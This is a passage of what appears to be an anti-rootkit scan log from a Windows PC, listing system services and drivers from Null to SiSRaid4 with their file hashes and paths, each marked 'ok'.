21:27:07.0548 0x0ce4  [ 4FFB2D5655D10700D5B8E205C4DB86BD, 69078960669A373F9C2D47AF2ED841619831106B681EBAAEAAE5BD569A54CE6D ] Null            C:\WINDOWS\system32\drivers\Null.sys
21:27:07.0555 0x0ce4  Null - ok
21:27:07.0559 0x0ce4  [ 99EB6376EC2C03CE5F668577651E3454, A783FFBF89A9074E2074ACAF3F55862DF2F05CAFEAF6A2D509DDA665EB0D59CB ] nvdimmn         C:\WINDOWS\System32\drivers\nvdimmn.sys
21:27:07.0567 0x0ce4  nvdimmn - ok
21:27:07.0572 0x0ce4  [ 3DB2E9E207358BFBD09B77B5119ECA5B, 55FED85EFC06B7AB5031D9986E4E4D2FA8841C549081ABBA9F9D9BBAB7852B37 ] nvraid          C:\WINDOWS\system32\drivers\nvraid.sys
21:27:07.0580 0x0ce4  nvraid - ok
21:27:07.0588 0x0ce4  [ 4C04BFBD4DB2EECCC47F5FA39D65BB6E, 9312DC4F7000991946D92D87DD9D37D70E336629EDBA553BFC79804049E34B73 ] nvstor          C:\WINDOWS\system32\drivers\nvstor.sys
21:27:07.0595 0x0ce4  nvstor - ok
21:27:07.0602 0x0ce4  [ 0D611DC17E48B6F8DD466A089170D118, E55A78E2CC6A0A5F7B8F0B75DFB2297FBC3B959C4FDEFBEA1C6C4E7706724AEB ] OneSyncSvc      C:\WINDOWS\System32\APHostService.dll
21:27:07.0622 0x0ce4  OneSyncSvc - ok
21:27:07.0652 0x0ce4  [ 29B093BA6759118DB14AF41026385E03, 660176D122344A79E52FFD9FE3D32D1967D9B22BC4AD76549D839B09693D0713 ] Origin Client Service C:\Program Files (x86)\Origin\OriginClientService.exe
21:27:07.0683 0x0ce4  Origin Client Service - ok
21:27:07.0692 0x0ce4  [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] p2pimsvc        C:\WINDOWS\system32\pnrpsvc.dll
21:27:07.0706 0x0ce4  p2pimsvc - ok
21:27:07.0714 0x0ce4  [ D1A9C22A98A10EB11A190B8FC7C07C6A, 1DE5F07E707DA9D833F105A8D948BBAEF0172DB2147D9A665EC7320F88D57B9E ] p2psvc          C:\WINDOWS\system32\p2psvc.dll
21:27:07.0730 0x0ce4  p2psvc - ok
21:27:07.0734 0x0ce4  [ 2CC6C325B271C7CA60F374F8F868CB45, 569391CA5DF003ED33CAA89FD38834641023C24F7FAE2261F6DA8ABC5CC9C3C9 ] Parport         C:\WINDOWS\System32\drivers\parport.sys
21:27:07.0742 0x0ce4  Parport - ok
21:27:07.0747 0x0ce4  [ 664B7DDEE982ADF5EAB480C75B9F6218, 1D1403CBD75916B83EEFA9B235E237583C40025C87C13676247F1EAD3F1D33EE ] partmgr         C:\WINDOWS\system32\drivers\partmgr.sys
21:27:07.0754 0x0ce4  partmgr - ok
21:27:07.0763 0x0ce4  [ 72ABB842C15A6C3AC3D954308C6BF206, 8F2A69E3BE43BCD2C8A39153062216B5CCEC9FA62205EC8A23FAB209DFAE7062 ] PcaSvc          C:\WINDOWS\System32\pcasvc.dll
21:27:07.0778 0x0ce4  PcaSvc - ok
21:27:07.0785 0x0ce4  [ C5B74C6D87E77BC64DEBD1BF57DEB375, AEBC86E404D4E3985D9FBAD9913AC52127DDE7C79062830717CDFEEA4CD7CC0B ] pci             C:\WINDOWS\system32\drivers\pci.sys
21:27:07.0796 0x0ce4  pci - ok
21:27:07.0799 0x0ce4  [ CFB85CB7A6F6926EA0EB96EDFB3C8A91, 7B3A58C165DF231BB202D8A2036272932439864F8EBDC62811E2BEFA8B36FC01 ] pciide          C:\WINDOWS\system32\drivers\pciide.sys
21:27:07.0805 0x0ce4  pciide - ok
21:27:07.0809 0x0ce4  [ 13B7D84B397A90E82682C47A15C3A98D, 7F897DA83209381A8C26B34416899E276256AB587DC4E2B60B185CAC8D1877F0 ] pcmcia          C:\WINDOWS\system32\drivers\pcmcia.sys
21:27:07.0817 0x0ce4  pcmcia - ok
21:27:07.0820 0x0ce4  [ 76EA512FD9D4673CF7A57775EE8922E2, 6D2B90616A46BC4F9BB6BACBD78EB33C23834987365C87617AFC2E147871C984 ] pcw             C:\WINDOWS\system32\drivers\pcw.sys
21:27:07.0826 0x0ce4  pcw - ok
21:27:07.0830 0x0ce4  [ 4A88D29869609A39782EF53145E6F7CA, 6200E0B96FD0289D7F95779723E3CABBDEE17EDE5F802CC51E5539F475711027 ] pdc             C:\WINDOWS\system32\drivers\pdc.sys
21:27:07.0837 0x0ce4  pdc - ok
21:27:07.0849 0x0ce4  [ 4F190BA3C9BD2F0277BCBF480F396091, F09613C76350706992B39D7EA9B859D28F00790E5AC17CA7D49C3E270B9D8994 ] PEAUTH          C:\WINDOWS\system32\drivers\peauth.sys
21:27:07.0877 0x0ce4  PEAUTH - ok
21:27:07.0906 0x0ce4  [ F5C8E47E2F7B72ACEA49F7AD2EA60D3B, 184B5C91BF36A03257A38E8FB5FDBEF96AE88F0F5FF2EEEAE7BFC6CA15CC1602 ] PeerDistSvc     C:\WINDOWS\system32\peerdistsvc.dll
21:27:07.0953 0x0ce4  PeerDistSvc - ok
21:27:07.0961 0x0ce4  [ FE52FF97A094609429FEF098EDC6FB08, 6762ED340048AF61B756CB7B576BE2057768FDB677623D01F2A592727C0E5A00 ] percsas2i       C:\WINDOWS\system32\drivers\percsas2i.sys
21:27:07.0967 0x0ce4  percsas2i - ok
21:27:07.0970 0x0ce4  [ FCA143274792F12383C35902E801E83A, 87D93226E32153794993035553C9935D07242631E182460D8ED13650175C0F01 ] percsas3i       C:\WINDOWS\system32\drivers\percsas3i.sys
21:27:07.0977 0x0ce4  percsas3i - ok
21:27:07.0988 0x0ce4  [ 4DAD2C73778D41F951B33854936E7BDC, 1421FDA2D083D5923422A038C54603BF798C48DDB7244DBEDA46D537B8CE1534 ] PerfHost        C:\WINDOWS\SysWow64\perfhost.exe
21:27:07.0996 0x0ce4  PerfHost - ok
21:27:08.0016 0x0ce4  [ B730E963A31B73938A76D7B80666D60D, FADF452637E2EB50CC8C0E75956FE01F029C587F6EF2F8B347213263DE9D3A80 ] PhoneSvc        C:\WINDOWS\System32\PhoneService.dll
21:27:08.0047 0x0ce4  PhoneSvc - ok
21:27:08.0053 0x0ce4  [ 97D85602B8131C487EB08A36F7343F5E, BEDC106AF06358D40BB034390645A5BFF9C138CFD51B5997D32614741D3D2372 ] PimIndexMaintenanceSvc C:\WINDOWS\System32\PimIndexMaintenance.dll
21:27:08.0064 0x0ce4  PimIndexMaintenanceSvc - ok
21:27:08.0088 0x0ce4  [ F9FB601621FF33376F3908C2C27C6EF4, 8689565D4FD1C68826EA0A9C2B44377A2AEC3CD812595F0D32904D8FA5809672 ] pla             C:\WINDOWS\system32\pla.dll
21:27:08.0128 0x0ce4  pla - ok
21:27:08.0134 0x0ce4  [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] PlugPlay        C:\WINDOWS\system32\umpnpmgr.dll
21:27:08.0153 0x0ce4  PlugPlay - ok
21:27:08.0161 0x0ce4  [ 414CA4DCC31D795882B25ADC1DACE779, AFD8D9AA24C64DD9569FDCBE65171810FE27AF24B8DD2941FECE6245EABB6AAC ] pmem            C:\WINDOWS\System32\drivers\pmem.sys
21:27:08.0170 0x0ce4  pmem - ok
21:27:08.0173 0x0ce4  [ D54385DD5A39A5636D1587FC9ECFC337, DEEA5D433CB2DA55AE58C7C5431A1249C94B61606F0A75E4A44D516619060263 ] PNRPAutoReg     C:\WINDOWS\system32\pnrpauto.dll
21:27:08.0181 0x0ce4  PNRPAutoReg - ok
21:27:08.0188 0x0ce4  [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] PNRPsvc         C:\WINDOWS\system32\pnrpsvc.dll
21:27:08.0202 0x0ce4  PNRPsvc - ok
21:27:08.0211 0x0ce4  [ 118E91AEE8F6DDAD088F955498CF2487, F4447C64CF1F36432E0FF09B6712DCE61BF28E3499F20C6C69E80D98B42D671E ] PolicyAgent     C:\WINDOWS\System32\ipsecsvc.dll
21:27:08.0229 0x0ce4  PolicyAgent - ok
21:27:08.0235 0x0ce4  [ 456DEA8B86DD28A2BAD65DC0F05B659E, CF23418563605C0255C903366D92F8A0C4CAA407000F509D558F676DD843DBCD ] Power           C:\WINDOWS\system32\umpo.dll
21:27:08.0246 0x0ce4  Power - ok
21:27:08.0250 0x0ce4  [ D292D7FADCEE481CC64A9DE8FE9C3347, BD870A375E33CD8434CA97FFE9C2F84E58C6CD0EAEEEE8922172CB01F9674B55 ] PptpMiniport    C:\WINDOWS\System32\drivers\raspptp.sys
21:27:08.0266 0x0ce4  PptpMiniport - ok
21:27:08.0306 0x0ce4  [ 5404E7A968A26DF03793B6F68536594D, BE5A85581E87EFE4DB43AD17B8D42D3F7F32364AEEC1416DBB94279C4A203FF2 ] PrintNotify     C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
21:27:08.0371 0x0ce4  PrintNotify - ok
21:27:08.0381 0x0ce4  [ D57CF871B3977731A91FE9611A54C7C1, B6C7F685716A88D0978377B83C5320C88EED0CAA44A001849AAFF71E4E0682E7 ] Processor       C:\WINDOWS\System32\drivers\processr.sys
21:27:08.0391 0x0ce4  Processor - ok
21:27:08.0410 0x0ce4  [ 9ED60073731578E355E120327622C5DC, 863B4C7C0444E8EB212932739F68910F5E4C8F2677F0CB92381EBF6CB0AB7CC0 ] ProductAgentService C:\Program Files\Bitdefender Agent\ProductAgentService.exe
21:27:08.0431 0x0ce4  ProductAgentService - ok
21:27:08.0440 0x0ce4  [ 56A7713DE64B16FB309D132E88FDB098, A658C8DCA87442F33B726A9B2060B20393D83B8658D0894C046CAFEAB00E2D8A ] ProfSvc         C:\WINDOWS\system32\profsvc.dll
21:27:08.0457 0x0ce4  ProfSvc - ok
21:27:08.0462 0x0ce4  [ B60431D2A046AD97F8427F6E568370F5, CD488E343585A5AC19D9AAF88BF0BB7EEA1BC48F6DA4A4FBF9BE5A04ECF5040B ] Psched          C:\WINDOWS\system32\drivers\pacer.sys
21:27:08.0469 0x0ce4  Psched - ok
21:27:08.0474 0x0ce4  [ 80072EED0FDBC77E1F245B27995A40F2, E83B85B81A72CA67E4797017A0E44CF6074F49AD0BA1F0B7342C889CAA714B29 ] PSINAflt        C:\WINDOWS\system32\DRIVERS\PSINAflt.sys
21:27:08.0481 0x0ce4  PSINAflt - ok
21:27:08.0485 0x0ce4  [ 19BEE6C83EF303FF186B2756BC6C7CB1, A48D0601C2516003DFBB55C6097A0C193B9D71F788876D34B71BAB7802B48FAE ] PSINFile        C:\WINDOWS\system32\DRIVERS\PSINFile.sys
21:27:08.0491 0x0ce4  PSINFile - ok
21:27:08.0496 0x0ce4  [ 256A4A55910490B97DD4046428680CE9, 093A958E75DFA1A6FE5EFEE2FAEF867BD255958C92B389D6EDDD82D8AE185E62 ] PSINKNC         C:\WINDOWS\system32\DRIVERS\PSINKNC.sys
21:27:08.0503 0x0ce4  PSINKNC - ok
21:27:08.0508 0x0ce4  [ 24E82387D730C4EAD43D1C3D0714F0E2, 06F1EB7529839C5375437DB2CD1840BA3F6227929A175E5058750B8BAC4A6626 ] PSINProc        C:\WINDOWS\system32\DRIVERS\PSINProc.sys
21:27:08.0514 0x0ce4  PSINProc - ok
21:27:08.0518 0x0ce4  [ 7DF81D950D0A4A7D855B8C3A1BC96915, AC3F51F034E2EFDDE287AD912B01D63121873C3EBEE034E09C742247CCE25985 ] PSINProt        C:\WINDOWS\system32\DRIVERS\PSINProt.sys
21:27:08.0525 0x0ce4  PSINProt - ok
21:27:08.0529 0x0ce4  [ A546D3C1C5B3B58FE46757F475F523D0, C8825E3E377BA0E78928250B3D8E2E1562F4F6E5BB05E6548E71DB197CEDD588 ] PSINReg         C:\WINDOWS\system32\DRIVERS\PSINReg.sys
21:27:08.0535 0x0ce4  PSINReg - ok
21:27:08.0538 0x0ce4  [ F803473CD0E5D36D02EB58109F1294CD, DB6FFB4100BD35D491FF1C61FB3073049C2C18038D004A6D1E279A95AB8BA2EC ] PSKMAD          C:\WINDOWS\system32\DRIVERS\PSKMAD.sys
21:27:08.0546 0x0ce4  PSKMAD - ok
21:27:08.0553 0x0ce4  [ E0DCCA2A78516D155A6485CCA99F0EA5, EAFD24F815ECD6373BEC8E75B24FB54694CB8E4FF430FB6886F9B5B1C1762BFC ] QWAVE           C:\WINDOWS\system32\qwave.dll
21:27:08.0571 0x0ce4  QWAVE - ok
21:27:08.0574 0x0ce4  [ A2B0F46FBA2521E7E732BDBDB1238515, 7F0FEFB09770BF5889D6C2219F68399C962A3F1071E70C4951B6FDAE196CF041 ] QWAVEdrv        C:\WINDOWS\system32\drivers\qwavedrv.sys
21:27:08.0588 0x0ce4  QWAVEdrv - ok
21:27:08.0591 0x0ce4  [ EA9EB06EFC325CD2ACF5DF2F26A4894E, 32AC7EDB42CDA736E2AD9AB67795735F16234D9BD80D56FDAE5B8B3C3C1CC26F ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
21:27:08.0598 0x0ce4  RasAcd - ok
21:27:08.0602 0x0ce4  [ 4E9379389D0A851DD19D130C8FAEFBD0, 279A25EF8949A5BAF311CA75493A5F89F74A02711EF875F67D0A95849B409C00 ] RasAgileVpn     C:\WINDOWS\System32\drivers\AgileVpn.sys
21:27:08.0618 0x0ce4  RasAgileVpn - ok
21:27:08.0621 0x0ce4  [ 3E8CB44832FE3F96047187291523CDA1, 999A10D4D50CD2C39309FDC04A9F4CB0959BA061AE9305D4DF7F00F37F3813F9 ] RasAuto         C:\WINDOWS\System32\rasauto.dll
21:27:08.0632 0x0ce4  RasAuto - ok
21:27:08.0636 0x0ce4  [ 5279EC98F6218D29EADDFECCC0D80E9A, 6F376FC3BEFA9F521635192177962AF1F41173502EC067896B7C2A5FB71E7A3B ] Rasl2tp         C:\WINDOWS\System32\drivers\rasl2tp.sys
21:27:08.0651 0x0ce4  Rasl2tp - ok
21:27:08.0665 0x0ce4  [ AC6A0AE3B33EE783717820458882F91C, EA503A90DBC31FB6B5D047D59E0F2855880EF3877877AD576579DB5CD8188E4A ] RasMan          C:\WINDOWS\System32\rasmans.dll
21:27:08.0697 0x0ce4  RasMan - ok
21:27:08.0701 0x0ce4  [ D7FF75ED7A48FD60A573C9E959CF4DB5, C67673E2D678527F8C07C9BCC487D385B92282D9D73396CFB01F14F5211CA991 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
21:27:08.0710 0x0ce4  RasPppoe - ok
21:27:08.0713 0x0ce4  [ 6A4E45A7F17FA0B4B1B48C550E311944, 1E84A559B7AA5F07E8156D223EFFB1B2B43D1E4E90E561D8DF2C257FFBCFDC0D ] RasSstp         C:\WINDOWS\System32\drivers\rassstp.sys
21:27:08.0729 0x0ce4  RasSstp - ok
21:27:08.0737 0x0ce4  [ F2C575A9657F7B2E027C6CE7BC8F1A2D, 5D002488CCEDCEBF0542F508FCE47DC9105C67D5685489970048437BD243AC0E ] rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
21:27:08.0749 0x0ce4  rdbss - ok
21:27:08.0753 0x0ce4  [ 9414B22E093243636D362BF8C8C12A67, 575CE91AFADD771CBF86377962EDFAF70150BBA575F8DF144FEE6CC1C0FF88E0 ] rdpbus          C:\WINDOWS\System32\drivers\rdpbus.sys
21:27:08.0760 0x0ce4  rdpbus - ok
21:27:08.0765 0x0ce4  [ 53A01D3FDB701AC5D9DDE4140227E3D9, 833AF0BAAB49B58C71C684D2AA20B900C27E19DDCE5E15355C7ABAAB33BC7673 ] RDPDR           C:\WINDOWS\system32\drivers\rdpdr.sys
21:27:08.0775 0x0ce4  RDPDR - ok
21:27:08.0780 0x0ce4  [ DF32ED51DC0C3F6F3B1C4CEF71B8B426, DBEAD271B5DE6439E3106BDDB8B1E47D7BA47AE203CF3E1F8924CE02FDCA6E0B ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
21:27:08.0786 0x0ce4  RdpVideoMiniport - ok
21:27:08.0792 0x0ce4  [ 2369A5B651308E0C3458143976E9B03B, 0EDE99F7E2A7668E90C2FCA11D4BCE0676FBEA2CCFB57A004827CE5FE96D1584 ] rdyboost        C:\WINDOWS\system32\drivers\rdyboost.sys
21:27:08.0802 0x0ce4  rdyboost - ok
21:27:08.0828 0x0ce4  [ 3581FB9529035F8EC6DB681664CA70B1, 0C7BCD6A3B4248683C52B69F0B373D5929C2375F9BBF6CA80C480A8E7446A30C ] ReFS            C:\WINDOWS\system32\drivers\ReFS.sys
21:27:08.0861 0x0ce4  ReFS - ok
21:27:08.0877 0x0ce4  [ 79E1ADE19D8B7C56EF29D098EAF57AD0, 295D0F04359A00849759976710F6CB83DB96E5007946930EA19865620EA3EFE7 ] ReFSv1          C:\WINDOWS\system32\drivers\ReFSv1.sys
21:27:08.0896 0x0ce4  ReFSv1 - ok
21:27:08.0907 0x0ce4  [ D91C597DE82E1500525945E1FFF24B0F, 3F5837A743715FB2CCBFC9458FBE010AED170B46515925D4C7C59BBAC792F695 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
21:27:08.0924 0x0ce4  RemoteAccess - ok
21:27:08.0929 0x0ce4  [ 19D1072193DAF71C97E5A05FC7673BB3, 313C3762CCC490C20B5561A78E6002E7A52F0142B370F17849DD4AB2F0AF6513 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
21:27:08.0945 0x0ce4  RemoteRegistry - ok
21:27:08.0957 0x0ce4  [ A12D167F73C3E285AC623BCA62B3A8BC, 6E8213808C22C0688BD40721FBBBAA88BFEFA1BD304BC19AA015FC541CA5BF84 ] RetailDemo      C:\WINDOWS\system32\RDXService.dll
21:27:08.0978 0x0ce4  RetailDemo - ok
21:27:08.0983 0x0ce4  [ 5F44B0167AA65BFFC778227725CB258C, 00027F82639C7E054CF42179A26B5D43FD789C943979EF3F29BC364319A2D306 ] RFCOMM          C:\WINDOWS\System32\drivers\rfcomm.sys
21:27:08.0993 0x0ce4  RFCOMM - ok
21:27:08.0998 0x0ce4  [ D31B2CD9458D2E212A5F24D56D2FB8D5, D8EC0BDB9D143C050A48217C57AA1BA6D60EEFEF67A98441064BD8FD339987DD ] RmSvc           C:\WINDOWS\System32\RMapi.dll
21:27:09.0015 0x0ce4  RmSvc - ok
21:27:09.0019 0x0ce4  [ C79F1F7C8A5FCBE90E3C833299AA1F59, 7969E79B2095BDA144AA369DE21F49C9FAD272B5864B2F0FD28CB28D148F2AD6 ] RpcEptMapper    C:\WINDOWS\System32\RpcEpMap.dll
21:27:09.0028 0x0ce4  RpcEptMapper - ok
21:27:09.0031 0x0ce4  [ 1CE6928C1587F9760F7C3A036786CAE8, 3E4F5371E0DDDBA612BF61891D17D691DCAFB2E1010BBD84737FBD98DA8C03DE ] RpcLocator      C:\WINDOWS\system32\locator.exe
21:27:09.0039 0x0ce4  RpcLocator - ok
21:27:09.0056 0x0ce4  [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] RpcSs           C:\WINDOWS\system32\rpcss.dll
21:27:09.0085 0x0ce4  RpcSs - ok
21:27:09.0090 0x0ce4  [ E87EECED9287C275B6CF30EB598B1D77, D0C5D4E37A3FAD422C0ECFFAB53904D9FD5385129DE2BC5AF75D91CD016EA6AC ] rspndr          C:\WINDOWS\system32\drivers\rspndr.sys
21:27:09.0104 0x0ce4  rspndr - ok
21:27:09.0118 0x0ce4  [ 3AB1AA5155684F40E2F5215A258D2471, 3D6A5F603FA6809651A006EA31F57920A45642B6B9E8EC80E5399D1301F635E4 ] RTL8168         C:\WINDOWS\System32\drivers\Rt630x64.sys
21:27:09.0133 0x0ce4  RTL8168 - ok
21:27:09.0136 0x0ce4  RtNdPt630 - ok
21:27:09.0138 0x0ce4  RTTEAMPT - ok
21:27:09.0140 0x0ce4  RTVLANPT - ok
21:27:09.0142 0x0ce4  [ 6308366D3CDEA5F427CFF4BCF0081B4E, ABB91A41C09A1607C66BD380FD0A3EECAAF9AD534856CCC78DE1A4E450ADB07F ] s3cap           C:\WINDOWS\System32\drivers\vms3cap.sys
21:27:09.0149 0x0ce4  s3cap - ok
21:27:09.0152 0x0ce4  [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] SamSs           C:\WINDOWS\system32\lsass.exe
21:27:09.0159 0x0ce4  SamSs - ok
21:27:09.0163 0x0ce4  [ 33B2DC5C2F19DA89F862484E23D9833D, 1C3BD1804767D087BE1510EEDCE94FFAC096922C821A123DB1BACDA5777246A7 ] sbp2port        C:\WINDOWS\system32\drivers\sbp2port.sys
21:27:09.0170 0x0ce4  sbp2port - ok
21:27:09.0175 0x0ce4  [ 6A7F961E0E6382F185809AEC6A97E078, 434E215337453C3973762A2F10806A57F3B296DDD34A948F781B67E374836AF5 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.dll
21:27:09.0189 0x0ce4  SCardSvr - ok
21:27:09.0194 0x0ce4  [ 45B203A8CD642F72E86690B957B6490D, 29D5733D2A6FF9F051FD74FFDCCDB5272EC8E7734021F5BBF0E9E521E61B150F ] ScDeviceEnum    C:\WINDOWS\System32\ScDeviceEnum.dll
21:27:09.0207 0x0ce4  ScDeviceEnum - ok
21:27:09.0210 0x0ce4  [ 5CFEEFCC6FAD1FD09ACCFBD652DDD85B, F90104CC42073ACD48A2FCCEDF58B57D8663223406ECB0A270140A053E9260B3 ] scfilter        C:\WINDOWS\system32\DRIVERS\scfilter.sys
21:27:09.0218 0x0ce4  scfilter - ok
21:27:09.0232 0x0ce4  [ 5BBFA6CA63E8A5BB8FA2FA84A5562CE2, C74CD0A76473343A8620D26C96F7300026C295EDF61B8A336AB326DFE861678D ] Schedule        C:\WINDOWS\system32\schedsvc.dll
21:27:09.0263 0x0ce4  Schedule - ok
21:27:09.0268 0x0ce4  [ 5C8620FAC0E3C1658C8EF7AD7BB7EA5F, FEBE7FC79FCDF692167D82DE54031FD68BD2941544007EEB3D82C21E7F1C5C83 ] scmbus          C:\WINDOWS\system32\drivers\scmbus.sys
21:27:09.0274 0x0ce4  scmbus - ok
21:27:09.0279 0x0ce4  [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] SCPolicySvc     C:\WINDOWS\System32\certprop.dll
21:27:09.0290 0x0ce4  SCPolicySvc - ok
21:27:09.0293 0x0ce4  [ AD7189E85A0801DE0507C610963A3CD0, 0AA9F3C9D252624CC62EC95FD910C6911E136DD3E66159CEB9857BC7AB70FAA2 ] ScpVBus         C:\WINDOWS\System32\drivers\ScpVBus.sys
21:27:09.0298 0x0ce4  ScpVBus - ok
21:27:09.0304 0x0ce4  [ DCD86049661A2C36DEE69D9DF7C3330D, DFFE21D91289C17A1ACE1311A8621EDC0C6579552B4C22FEC3BD884746234114 ] sdbus           C:\WINDOWS\System32\drivers\sdbus.sys
21:27:09.0314 0x0ce4  sdbus - ok
21:27:09.0317 0x0ce4  [ 464B615872981015AC4FEEBDEA83A063, 5CF491352B267241CA11F08E72E6EA668A595662561892E0D02CCA5B71172E14 ] SDFRd           C:\WINDOWS\System32\drivers\SDFRd.sys
21:27:09.0323 0x0ce4  SDFRd - ok
21:27:09.0327 0x0ce4  [ 847F01FB8504425BB255856A14278A86, 41997D25D12779CA79551988C56FA0A302367076B09A82F620858EDDDBFCE3FF ] SDRSVC          C:\WINDOWS\System32\SDRSVC.dll
21:27:09.0338 0x0ce4  SDRSVC - ok
21:27:09.0341 0x0ce4  [ 6BC219F1D9CDE08CEB9084ADB41FBA01, DA8AC3B42A72515A1976961976203A52D4C8636586EB5EF6B466AAF967A6567E ] sdstor          C:\WINDOWS\System32\drivers\sdstor.sys
21:27:09.0348 0x0ce4  sdstor - ok
21:27:09.0351 0x0ce4  [ 2AE8505519C7E8A903DD7BE793A79846, 7044B1BC183E028BCFB544489B033F0968F033696F9816F354329ABD26C6EE7E ] seclogon        C:\WINDOWS\system32\seclogon.dll
21:27:09.0364 0x0ce4  seclogon - ok
21:27:09.0372 0x0ce4  [ 09301074EA03CA8E82EAB16ADA1217CA, 4A303880959F611B199C810D231539B7DE618E28041BFA30891F2C55A70754D7 ] SecurityHealthService C:\WINDOWS\system32\SecurityHealthService.exe
21:27:09.0383 0x0ce4  SecurityHealthService - ok
21:27:09.0402 0x0ce4  [ 77FB9BE8EDDCC999D09F2B1A7878A2A9, 589774C006A339FCA9772C37C9103C73C8592E018553804B97F34E2A0069A3F7 ] SEMgrSvc        C:\WINDOWS\system32\SEMgrSvc.dll
21:27:09.0433 0x0ce4  SEMgrSvc - ok
21:27:09.0437 0x0ce4  [ 25456AF499A0C9C4A93CFAC70BDE9CC2, 885C1A9C8BFA73D9C9C454759DF871237F7C0F28D879E98B4BE0D0113C549B09 ] SENS            C:\WINDOWS\System32\sens.dll
21:27:09.0449 0x0ce4  SENS - ok
21:27:09.0451 0x0ce4  Sense - ok
21:27:09.0470 0x0ce4  [ 892C955E1081412942F64679E0DD7A5D, 6A28012270FA1FB3BB279102C67FA5296564630181C887E1EA6EA1F952A30C37 ] SensorDataService C:\WINDOWS\System32\SensorDataService.exe
21:27:09.0510 0x0ce4  SensorDataService - ok
21:27:09.0521 0x0ce4  [ 358008CBDE5603F3B56789C977661CE3, 2C81180B27B854F201A683D2C75677660CA54ADC685F86CD414537C60D51FB4A ] SensorService   C:\WINDOWS\system32\SensorService.dll
21:27:09.0540 0x0ce4  SensorService - ok
21:27:09.0545 0x0ce4  [ 9B3744C26F206F9F90713D93A93C8B6E, D194F668D8BDDDB4356136CACF1FAD46E7566939C624029EF6E28D7A192B8EBF ] SensrSvc        C:\WINDOWS\system32\sensrsvc.dll
21:27:09.0557 0x0ce4  SensrSvc - ok
21:27:09.0560 0x0ce4  [ 585329F62195A4B7AAD0A95F6EC89751, E7ADED97ACA8E8E06C368E24702C22D4C2B0B9495DEA24A2DC2A30782099BDCE ] SerCx           C:\WINDOWS\system32\drivers\SerCx.sys
21:27:09.0567 0x0ce4  SerCx - ok
21:27:09.0571 0x0ce4  [ C8F4FDA8B3D039D7947344614FF5BFB2, 1A3B88EC59F2A820AFE4F3AC65F7149EAC68672D1F0D729CBB575694005A8911 ] SerCx2          C:\WINDOWS\system32\drivers\SerCx2.sys
21:27:09.0579 0x0ce4  SerCx2 - ok
21:27:09.0581 0x0ce4  [ E5B450E4E0DC1591254BF9CCF6C57B40, 958E7378D9BDE1F2EBE736D8D9912D56835A606AABDD042443A35CA37EC70F11 ] Serenum         C:\WINDOWS\System32\drivers\serenum.sys
21:27:09.0588 0x0ce4  Serenum - ok
21:27:09.0592 0x0ce4  [ 628D8DD136F92316BFEB58FA005338B7, 0CDA673D31F40EBD07E9F67667DB6077F23DCADE2DD8376AB550575224625D44 ] Serial          C:\WINDOWS\System32\drivers\serial.sys
21:27:09.0600 0x0ce4  Serial - ok
21:27:09.0603 0x0ce4  [ E5BA0B7353ADC5C95AB466D2E4DC89B1, 98F2A22ED892B2610C85EAAAB51DF25939599955A27611FCE9E68C3701CFD4EA ] sermouse        C:\WINDOWS\System32\drivers\sermouse.sys
21:27:09.0610 0x0ce4  sermouse - ok
21:27:09.0620 0x0ce4  [ 043D7B39E693C610036BD56DF30EF440, 329D29CE1CB5F502B7DFCBE24878CA61EC56787A1B02195E19499701B194DE08 ] SessionEnv      C:\WINDOWS\system32\sessenv.dll
21:27:09.0636 0x0ce4  SessionEnv - ok
21:27:09.0638 0x0ce4  [ 15CFCC4692DA8887B977CE5FC5181084, 31D86E122E35AB9E7275F2B0573EE98770BBE517ED3B9CCED97F4969C9A619F9 ] sfloppy         C:\WINDOWS\System32\drivers\sfloppy.sys
21:27:09.0645 0x0ce4  sfloppy - ok
21:27:09.0655 0x0ce4  [ 87B083252816171A17F833CBCB7AA85E, 200AB93CEF384791DC9B04D2AF17877CA10595B2CEDF4B9505E367A2382C4AB7 ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
21:27:09.0679 0x0ce4  SharedAccess - ok
21:27:09.0691 0x0ce4  [ 4293E11951DEAAFB3924AB1DAB1FAC08, 644974816DDF690B26F369E48533D654A5B298BCA993EE53EACB5C00E52E5243 ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
21:27:09.0715 0x0ce4  ShellHWDetection - ok
21:27:09.0721 0x0ce4  [ 1F73E6C66E7D9ED4FD58F9238D27430E, F1BFF9D3A0BB1981F6A1A3C23476675760E5AEFD919697D6DF00421576D93985 ] shpamsvc        C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
21:27:09.0734 0x0ce4  shpamsvc - ok
21:27:09.0739 0x0ce4  [ 2339F6B45E1D863B1D327F3AFD75A675, 03304ADC42EF6E8F671C8AA78A0D3E40408D870FBF2DA2B31A1727F86EF8F213 ] SiSRaid2        C:\WINDOWS\system32\drivers\SiSRaid2.sys
21:27:09.0744 0x0ce4  SiSRaid2 - ok
21:27:09.0748 0x0ce4  [ F520D50AD7266ED31D25DF4C8EA6BC2D, F68CF9EFB8319E59A8D9C24A36A198185DD79CBACD14510F5450F0024F0CD4D3 ] SiSRaid4        C:\WINDOWS\system32\drivers\sisraid4.sys
21:27:09.0755 0x0ce4  SiSRaid4 - ok
